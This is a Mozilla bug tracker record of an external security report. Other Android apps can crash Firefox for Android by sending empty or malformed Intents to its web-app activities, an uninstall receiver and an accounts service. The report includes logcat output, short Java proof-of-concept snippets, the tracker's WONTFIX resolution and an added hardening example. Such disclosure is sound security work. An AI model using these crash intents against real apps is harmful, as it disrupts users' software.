Closed Bug 1036437 Opened 10 years ago Closed 8 years ago

Other Android apps can send malformed intents to crash Firefox

Categories

(Firefox for Android Graveyard :: Web Apps (PWAs), defect, P1)

Tracking

(Not tracked)

RESOLVED WONTFIX

People

(Reporter: curtisk, Unassigned)

Details

(Keywords: csectype-dos, sec-low, Whiteboard: [reporter-external][verif?][WebRuntime])

From: Claudiu Chelaru <claxche@gmail.com>
Subject: Security Bug Bounty: 103 ways to crash Firefox for Android
Message-Id: <6FCFE5B0-80F8-4D46-BF16-369834049089@gmail.com>
Date: Sat, 5 Jul 2014 14:04:15 +0300
To: security@mozilla.org
-----//-----
Hi,

During my research I’ve found some issues regarding Firefox for Android - (org.mozilla.firefox) via cross application exploitation. Upon receiving malformed data the app will crash with the following message: “Unfortunately, Firefox has stopped.” Tested on Samsung Galaxy S3 - Android 4.3 API 18.

1) Activities
Firefox crashes if an Intent with no arguments is sent to any of the following Activities:
- org.mozilla.firefox.Webapp
- org.mozilla.firefox.WebApps$WebApp0
- org.mozilla.firefox.WebApps$WebApp1
- org.mozilla.firefox.WebApps$WebApp2
- org.mozilla.firefox.WebApps$WebApp3
- org.mozilla.firefox.WebApps$WebApp4
- org.mozilla.firefox.WebApps$WebApp5
- org.mozilla.firefox.WebApps$WebApp6
- org.mozilla.firefox.WebApps$WebApp7
- org.mozilla.firefox.WebApps$WebApp8
- org.mozilla.firefox.WebApps$WebApp9
- org.mozilla.firefox.WebApps$WebApp10
- org.mozilla.firefox.WebApps$WebApp11
- org.mozilla.firefox.WebApps$WebApp12
- org.mozilla.firefox.WebApps$WebApp13
- org.mozilla.firefox.WebApps$WebApp14
- org.mozilla.firefox.WebApps$WebApp15
- org.mozilla.firefox.WebApps$WebApp16
- org.mozilla.firefox.WebApps$WebApp17
- org.mozilla.firefox.WebApps$WebApp18
- org.mozilla.firefox.WebApps$WebApp19
- org.mozilla.firefox.WebApps$WebApp20
- org.mozilla.firefox.WebApps$WebApp21
- org.mozilla.firefox.WebApps$WebApp22
- org.mozilla.firefox.WebApps$WebApp23
- org.mozilla.firefox.WebApps$WebApp24
- org.mozilla.firefox.WebApps$WebApp25
- org.mozilla.firefox.WebApps$WebApp26
- org.mozilla.firefox.WebApps$WebApp27
- org.mozilla.firefox.WebApps$WebApp28
- org.mozilla.firefox.WebApps$WebApp29
- org.mozilla.firefox.WebApps$WebApp30
- org.mozilla.firefox.WebApps$WebApp31
- org.mozilla.firefox.WebApps$WebApp32
- org.mozilla.firefox.WebApps$WebApp33
- org.mozilla.firefox.WebApps$WebApp34
- org.mozilla.firefox.WebApps$WebApp35
- org.mozilla.firefox.WebApps$WebApp36
- org.mozilla.firefox.WebApps$WebApp37
- org.mozilla.firefox.WebApps$WebApp38
- org.mozilla.firefox.WebApps$WebApp39
- org.mozilla.firefox.WebApps$WebApp40
- org.mozilla.firefox.WebApps$WebApp41
- org.mozilla.firefox.WebApps$WebApp42
- org.mozilla.firefox.WebApps$WebApp43
- org.mozilla.firefox.WebApps$WebApp44
- org.mozilla.firefox.WebApps$WebApp45
- org.mozilla.firefox.WebApps$WebApp46
- org.mozilla.firefox.WebApps$WebApp47
- org.mozilla.firefox.WebApps$WebApp48
- org.mozilla.firefox.WebApps$WebApp49
- org.mozilla.firefox.WebApps$WebApp50
- org.mozilla.firefox.WebApps$WebApp51
- org.mozilla.firefox.WebApps$WebApp52
- org.mozilla.firefox.WebApps$WebApp53
- org.mozilla.firefox.WebApps$WebApp54
- org.mozilla.firefox.WebApps$WebApp55
- org.mozilla.firefox.WebApps$WebApp56
- org.mozilla.firefox.WebApps$WebApp57
- org.mozilla.firefox.WebApps$WebApp58
- org.mozilla.firefox.WebApps$WebApp59
- org.mozilla.firefox.WebApps$WebApp60
- org.mozilla.firefox.WebApps$WebApp61
- org.mozilla.firefox.WebApps$WebApp62
- org.mozilla.firefox.WebApps$WebApp63
- org.mozilla.firefox.WebApps$WebApp64
- org.mozilla.firefox.WebApps$WebApp65
- org.mozilla.firefox.WebApps$WebApp66
- org.mozilla.firefox.WebApps$WebApp67
- org.mozilla.firefox.WebApps$WebApp68
- org.mozilla.firefox.WebApps$WebApp69
- org.mozilla.firefox.WebApps$WebApp70
- org.mozilla.firefox.WebApps$WebApp71
- org.mozilla.firefox.WebApps$WebApp72
- org.mozilla.firefox.WebApps$WebApp73
- org.mozilla.firefox.WebApps$WebApp74
- org.mozilla.firefox.WebApps$WebApp75
- org.mozilla.firefox.WebApps$WebApp76
- org.mozilla.firefox.WebApps$WebApp77
- org.mozilla.firefox.WebApps$WebApp78
- org.mozilla.firefox.WebApps$WebApp79
- org.mozilla.firefox.WebApps$WebApp80
- org.mozilla.firefox.WebApps$WebApp81
- org.mozilla.firefox.WebApps$WebApp82
- org.mozilla.firefox.WebApps$WebApp83
- org.mozilla.firefox.WebApps$WebApp84
- org.mozilla.firefox.WebApps$WebApp85
- org.mozilla.firefox.WebApps$WebApp86
- org.mozilla.firefox.WebApps$WebApp87
- org.mozilla.firefox.WebApps$WebApp88
- org.mozilla.firefox.WebApps$WebApp89
- org.mozilla.firefox.WebApps$WebApp90
- org.mozilla.firefox.WebApps$WebApp91
- org.mozilla.firefox.WebApps$WebApp92
- org.mozilla.firefox.WebApps$WebApp93
- org.mozilla.firefox.WebApps$WebApp94
- org.mozilla.firefox.WebApps$WebApp95
- org.mozilla.firefox.WebApps$WebApp96
- org.mozilla.firefox.WebApps$WebApp97
- org.mozilla.firefox.WebApps$WebApp98
- org.mozilla.firefox.WebApps$WebApp99

- The logcat log contains the following messages confirming that the application has crashed (applicable for all WebApps Classes as well):
* "FATAL EXCEPTION: main"
* "E/AndroidRuntime( 3055): android.app.SuperNotCalledException: Activity {org.mozilla.firefox/org.mozilla.firefox.Webapp} did not call through to super.onCreate()"
* "I/ActivityManager(  353): Process org.mozilla.firefox:org.mozilla.firefox.Webapp (pid 3055) has died."

- Proof of Concept (applicable for all WebApps Classes as well):
Intent intent = new Intent();
intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.firefox.Webapp"));
startActivity(intent);


2) Broadcast Receivers
Firefox crashes if an Intent is broadcasted to "org.mozilla.gecko.webapp.UninstallListener" with no arguments.

- The logcat log contains the following messages confirming that the application has crashed:
* "E/AndroidRuntime( 3071): FATAL EXCEPTION: main"
* "E/AndroidRuntime( 3071): java.lang.RuntimeException: Unable to start receiver org.mozilla.gecko.webapp.UninstallListener: java.lang.NullPointerException"

- Proof of Concept:
Intent intent = new Intent();
intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.webapp.UninstallListener"));
sendBroadcast(intent);


3) Services
Firefox crashes if a random message is sent to "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService".

- The logcat log contains the following messages confirming that the application has crashed:
* "E/AndroidRuntime( 3217): FATAL EXCEPTION: main"
* "E/AndroidRuntime( 3217): java.lang.RuntimeException: Unable to bind to service org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService@5274670c with Intent { cmp=org.mozilla.firefox/org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService }: java.lang.NullPointerException"

- Proof of Concept:
Intent service = new Intent();
service.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService"));
v.getContext().bindService(service, new ServiceConnection() {
    @Override
    public void onServiceConnected(ComponentName name, IBinder service) {
        Messenger messenger = new Messenger(service);
        try {
            messenger.send(Message.obtain(null, 1, 2, 3));
        } catch (RemoteException e) { }
    }

    @Override
    public void onServiceDisconnected(ComponentName name) { }
}, Context.BIND_AUTO_CREATE);


Kind Regards,
Claudiu Chelaru
assigned to mgoodwin for verification
Assignee: nobody → mgoodwin
Flags: sec-bounty?
Whiteboard: [reporter-external][verif?]
Summary: crashes Intents → crashes in intents
Component: General → Web Apps
QA Contact: aaron.train
Going to break point 3 into a separate bug.
See Also: → 1036459
Priority: -- → P1
Whiteboard: [reporter-external][verif?] → [reporter-external][verif?][WebRuntime]
Assignee: mgoodwin → nobody
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: sec-bounty? → sec-bounty-
Keywords: csectype-dos
Summary: crashes in intents → Other Android apps can send malformed intents to crash Firefox
Keywords: sec-low
Group: core-security → firefox-core-security
Per bug 1235869, we're going to disable the Android web runtime, so we won't fix this bug in it.

(This is part of a bulk resolution of bugs in the Firefox for Android::Web Apps component, from which I attempted to exclude bugs that are not specific to the runtime, but it's possible that I included one accidentally.  If so, I'm sorry, and please reopen the bug!)
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → WONTFIX
Group: firefox-core-security
Product: Firefox for Android → Firefox for Android Graveyard
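
The two crash classes in the report above (SuperNotCalledException in an activity, NullPointerException in a receiver given an empty Intent) are avoided by validating the incoming Intent after the framework call-through. The following is an added example, not Firefox source code and not part of the bug; the class names, the "manifestUrl" extra and the use of ACTION_PACKAGE_REMOVED are assumptions for illustration.

```java
import android.app.Activity;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

// Hypothetical exported activity that tolerates an Intent with no arguments.
class HardenedWebappActivity extends Activity {
    static final String EXTRA_MANIFEST_URL = "manifestUrl"; // assumed extra name

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        // SuperNotCalledException is raised when onCreate() returns without
        // calling super.onCreate(), so call it before any validation exit.
        super.onCreate(savedInstanceState);
        String url = null;
        try {
            Intent intent = getIntent();
            if (intent != null) url = intent.getStringExtra(EXTRA_MANIFEST_URL);
        } catch (RuntimeException e) {
            // Extras supplied by another app can fail to unparcel; treat as missing.
            Log.w("HardenedWebapp", "unreadable extras in incoming intent", e);
        }
        if (url == null || url.isEmpty()) {
            Log.w("HardenedWebapp", "rejecting intent without " + EXTRA_MANIFEST_URL);
            finish(); // safe: super.onCreate() has already run
            return;
        }
        setTitle(url); // start-up continues only with a validated value
    }
}

// Hypothetical receiver that ignores broadcasts lacking the data it needs.
class HardenedUninstallReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        // An explicit Intent from another app may carry no action and no data.
        if (intent == null || !Intent.ACTION_PACKAGE_REMOVED.equals(intent.getAction())) {
            return;
        }
        Uri data = intent.getData();
        String pkg = (data != null) ? data.getSchemeSpecificPart() : null;
        if (pkg == null) {
            return; // no package name, nothing to clean up
        }
        Log.i("HardenedUninstall", "cleaning up state for " + pkg);
    }
}
```

Components that no other app needs to reach can also be declared with android:exported="false" or guarded by a permission in the manifest, which keeps third-party Intents from being delivered at all.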